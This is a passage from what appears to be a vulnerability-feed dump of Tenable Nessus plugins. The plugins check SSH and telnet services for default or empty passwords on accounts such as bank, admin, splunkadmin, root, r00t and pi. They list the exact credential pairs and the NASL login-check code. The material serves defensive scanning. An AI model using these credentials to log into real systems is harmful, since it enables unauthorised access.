(description)\n{\n script_id(34082);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (bank) for 'bank' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'bank' on the remote host has the default password 'bank'.\nAn attacker may leverage this issue to gain access to the affected\nsystem and launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:50:44", "description": "The account 'cliuser' on the remote host has the password 'cliuser'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system.\n\nNote that Cisco Unified Computing System Platform Emulator is known to use these credentials to provide administrative access to the CLI.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-09-17T00:00:00", "type": "nessus", "title": "Default Password (cliuser) for 'cliuser' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_CLIUSER_CLIUSER.NASL", "href": "https://www.tenable.com/plugins/nessus/69920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"cliuser\";\npassword = \"cliuser\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69920);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (cliuser) for 'cliuser' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'cliuser' on the remote host has the password 'cliuser'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\n\nNote that Cisco Unified Computing System Platform Emulator is known to\nuse these credentials to provide administrative access to the CLI.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (!thorough_tests && !get_kb_item(\"Settings/test_all_accounts\")) exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:46:50", "description": "The account 'splunkadmin' on the remote host has the password 'changeme'. An attacker can leverage this issue to gain administrative access to the affected system.\n\nNote that Splunk virtual appliances are known to use these credentials to provide administrative access to the host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-02-04T00:00:00", "type": "nessus", "title": "Default Password (changeme) for 'splunkadmin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_SPLUNKADMIN_CHANGEME.NASL", "href": "https://www.tenable.com/plugins/nessus/81169", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"splunkadmin\";\npassword = \"changeme\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81169);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (changeme) for 'splunkadmin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'splunkadmin' on the remote host has the password\n'changeme'. An attacker can leverage this issue to gain administrative\naccess to the affected system.\n\nNote that Splunk virtual appliances are known to use these credentials\nto provide administrative access to the host.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:40:19", "description": "The account 'r00t' on the remote host has no password. An attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-09-04T00:00:00", "type": "nessus", "title": "Unpassworded 'r00t' account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_R00T.NASL", "href": "https://www.tenable.com/plugins/nessus/34083", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"r00t\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34083);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'r00t' account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host does not have a password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'r00t' on the remote host has no password. An attacker\nmay leverage this issue to gain access to the affected system and\nlaunch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:40:20", "description": "The account 'admin' on the remote host has the password 'admin'. An attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-09-04T00:00:00", "type": "nessus", "title": "Default Password (admin) for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_ADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/34081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"admin\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34081);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (admin) for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the password 'admin'. An\nattacker may leverage this issue to gain access to the affected system\nand launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:53:03", "description": "The account 'admin' on the remote host has the password 'netoptics'. \n\nAn attacker may leverage this issue to gain administrative access to the affected system. \n\nNote that Net Optics taps are known to use these credentials as factory defaults.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-10-23T00:00:00", "type": "nessus", "title": "Default Password (netoptics) for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["x-cpe:/h:net_optics:director"], "id": "ACCOUNT_ADMIN_NETOPTICS.NASL", "href": "https://www.tenable.com/plugins/nessus/70565", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"netoptics\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70565);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (netoptics) for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the password 'netoptics'. \n\nAn attacker may leverage this issue to gain administrative access to the\naffected system. \n\nNote that Net Optics taps are known to use these credentials as factory\ndefaults.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Log into the remote host and change the default login credentials.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/h:net_optics:director\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (!thorough_tests && !get_kb_item(\"Settings/test_all_accounts\")) exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:24:01", "description": "The account 'root' on the remote host has the password 'openelec'. \n\nAn attacker can exploit this issue to gain full access to the affected system. \n\nNote that a version of Linux optimized for Raspberry Pi ARM computers is known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-01-28T00:00:00", "type": "nessus", "title": "Default Password (openelec) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_OPENELEC.NASL", "href": "https://www.tenable.com/plugins/nessus/64261", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"openelec\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64261);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_xref(name:\"CERT\", value:\"544527\");\n\n script_name(english:\"Default Password (openelec) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'openelec'. \n\nAn attacker can exploit this issue to gain full access to the affected\nsystem. \n\nNote that a version of Linux optimized for Raspberry Pi ARM computers\nis known to use these credentials by default.\");\n # http://wiki.openelec.tv/index.php?title=OpenELEC_FAQ#SSH_Password_change\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2d8f5196\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/RasPlex/RasPlex/issues/453\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account, or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:24:01", "description": "The account 'pi' on the remote host has the password 'raspberry'. \n\nAn attacker may leverage this issue to gain full access to the affected system. \n\nNote that a version of Linux optimized for Raspberry Pi ARM computers is known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-01-28T00:00:00", "type": "nessus", "title": "Default Password (raspberry) for 'pi' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_PI_RASPBERRY.NASL", "href": "https://www.tenable.com/plugins/nessus/64260", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"pi\";\npassword = \"raspberry\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64260);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (raspberry) for 'pi' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'pi' on the remote host has the password 'raspberry'. \n\nAn attacker may leverage this issue to gain full access to the affected\nsystem. \n\nNote that a version of Linux optimized for Raspberry Pi ARM computers is\nknown to use these credentials by default.\");\n 